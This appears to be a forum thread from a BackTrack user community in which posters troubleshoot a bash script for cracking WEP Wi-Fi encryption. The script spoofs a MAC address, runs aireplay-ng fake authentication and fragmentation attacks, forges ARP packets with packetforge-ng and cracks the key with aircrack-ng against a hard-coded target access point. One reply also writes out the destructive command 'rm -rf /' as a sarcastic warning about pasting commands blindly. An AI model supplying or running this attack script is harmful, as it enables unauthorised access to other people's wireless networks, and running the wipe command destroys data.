i had replaced wlan0 -> wifi0 then i got error
I couldn't change mac address, can you help me change itERROR: Can't change MAC: interface up or not permission: Device or resource busy![]()
Also did you pay any attention to where this guide has been posted to?
Maybe you should be not just type what someone wrote and think a bit about it.
Or would you just do aif someone would tell you that it'd fix the issue?rm -rf /
Tiocfaidh ár lá
i had replaced wlan0 -> wifi0 then i got error
I couldn't change mac address, can you help me change itERROR: Can't change MAC: interface up or not permission: Device or resource busy![]()
No we can not help you change it. Go and learn the basics if you can't understand the errormessage. It clearly states what's wrong.
Use some common sense and you will find your solution![]()
Tiocfaidh ár lá
What is the problemaireplay-ng -4 -h $varmymac -b $varapmac ath0
For information, no action required: Using gettimeofday() instead of /dev/rtc
In the first, i had finished, but in the second, i didn't finish again Why so#!/bin/bash
macchanger -m 00:11:22:33:44:55 wifi0
varmymac="00:11:22:33:44:55"
# TARGET INFO
varapmac="00:02:CF:54:CF:80"
varchannel="6"
echo NOTES:
echo good power is 50+
rm -Rf out* repla* *.cap *.xor arp
airmon-ng start wifi0 $varchannel
aireplay-ng -1 0 -a $varapmac -h $varmymac ath0
#screen wait for Y
aireplay-ng -4 -h $varmymac -b $varapmac ath0
mv *.xor 1.xor
packetforge-ng -0 -a $varapmac -h $varmymac -k 255.255.255.255 -l 255.255.255.255 -w arp -y 1.xor
#screen
echo !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
echo ! PRESS Y ENTER WHEN THE PROMPT POPS UP !
echo !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
sleep 5
xterm -e "airodump-ng -c $varchannel --bssid $varapmac -w arps ath0" &
xterm -e "aireplay-ng -2 -r arp ath0" &
echo RUN !!!!!!
echo aircrack-ng -P 2 -b $varapmac '*.cap'
#aircrack-ng -P 2 -b $varapmac arp*.cap
# ettercap -i wlan0 -T -q -M ARP // //
# wesside-ng -i wlan0 -v AP?
Because you are reading and using a script made for BT2 with BT4 while there has been major changes in the base![]()
Tiocfaidh ár lá
learn to google error messages :
http://lmgtfy.com/?q=ERROR%3A+Can%27...resource+busy+
iface is up cant change mac
Did you have auto script for WPA cracking ?
Why in hell good power is different from BT3 to BT4??BT4
... echo good power is 50+
OLD for BT3
... echo good power is 40+
Which PWR is good anyway? How did you came to this conclusion?
installed BT$ prefilna with wepbuster tested OK
lol well the disclaimer is that it is a lame script so :P
i get this error when running on BT3. Is this script fixed ?
sorry double post..